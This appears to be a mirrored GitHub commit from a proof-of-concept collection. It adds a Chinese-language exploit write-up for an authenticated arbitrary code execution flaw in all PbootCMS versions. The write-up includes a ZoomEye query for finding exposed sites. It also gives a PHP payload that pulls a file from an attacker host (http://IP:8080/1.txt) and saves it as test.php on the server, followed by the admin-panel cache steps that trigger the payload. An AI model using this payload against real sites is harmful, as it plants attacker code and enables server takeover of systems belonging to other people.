mirror of
https://github.com/wy876/POC.git
synced 2025-02-27 04:39:25 +00:00
Create PbootCMS全版本后台通杀任意代码执行漏洞.md
This commit is contained in:
parent
b2b4849b54
commit
229bd17310
29
PbootCMS全版本后台通杀任意代码执行漏洞.md
Normal file
29
PbootCMS全版本后台通杀任意代码执行漏洞.md
Normal file
@ -0,0 +1,29 @@
|
||||
## PbootCMS全版本后台通杀任意代码执行漏洞
|
||||
|
||||
## ZoomEye
|
||||
```
|
||||
app:"PbootCMS"
|
||||
```
|
||||
|
||||
## poc
|
||||
```
|
||||
<?php
|
||||
|
||||
$test="copy";
|
||||
|
||||
$test("http://IP:8080/1.txt","test.php");
|
||||
|
||||
?>
|
||||
```
|
||||

|
||||
|
||||
然后来到全局配置-配置参数
|
||||
|
||||
打开动态缓存(如果本就打开 那则不需要打开) 点击右上角的清除缓存
|
||||

|
||||
|
||||

|
||||
|
||||
然后随便点击任意文章,触发漏洞
|
||||
|
||||

|
||||
Loading…
x
Reference in New Issue
Block a user